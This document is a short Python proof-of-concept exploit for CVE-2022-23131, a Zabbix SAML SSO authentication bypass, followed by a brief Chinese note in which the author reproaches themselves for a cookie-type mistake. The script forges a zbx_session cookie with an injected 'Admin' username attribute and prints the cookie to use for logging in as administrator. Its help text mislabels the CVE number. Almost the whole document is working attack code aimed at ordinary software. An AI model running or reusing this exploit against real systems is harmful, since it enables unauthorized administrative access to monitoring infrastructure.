Poc_CVE-2022-23131
1 import requests 2 import re 3 import argparse 4 import base64,urllib.parse 5 import json 6 7 def decode(para): 8 para = urllib.parse.unquote(para,encoding="utf-8") 9 base64_decode = base64.b64decode(para) 10 para_json = json.loads(base64_decode) 11 return para_json 12 13 def verify(url,payload): 14 url = url+'/index_sso.php?form=default' 15 cookie = payload 16 payload = {'zbx_session':payload} 17 res = requests.get(url=url,cookies=payload,verify=False) 18 re = 'icon-monitoring' 19 flag = re in str(res.text) 20 21 if flag: 22 print("It looks likely vulnerable") 23 print("And please use this cookie "+ '{\33[91m'+ cookie + '\33[0m}' +" to login zabbix~") 24 else: 25 print("It is strong") 26 27 def exploit(url): 28 url = 'http://'+url+'/zabbix' 29 response = requests.get(url=url,verify=False) 30 cookie = response.headers.get('Set-Cookie') 31 para1 = re.compile('zbx_session=(.*?);') 32 para2 = re.findall(para1,cookie)[0] 33 para = decode(para2) 34 payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":'+'"'+para['sessionid']+'"'+',"sign":'+'"'+para['sign']+'"'+'}' 35 payload_encode = urllib.parse.quote(base64.b64encode(payload.encode())) 36 verify(url,payload_encode) 37 38 if __name__ == '__main__': 39 parameter = argparse.ArgumentParser(description='Poc CVE-2022-22965:') 40 parameter.add_argument('-file',help='url file',required=False) 41 parameter.add_argument('-url',help='ip:port',required=False) 42 para = parameter.parse_args() 43 44 if para.url: 45 exploit(para.url) 46 exit() 47 else: 48 parameter.print_help()
之前直接使用cookie使用习惯了,忘记了这里cookie应该是dict类型……痛心疾首写在这里,警示一下粗心的chou毛病~
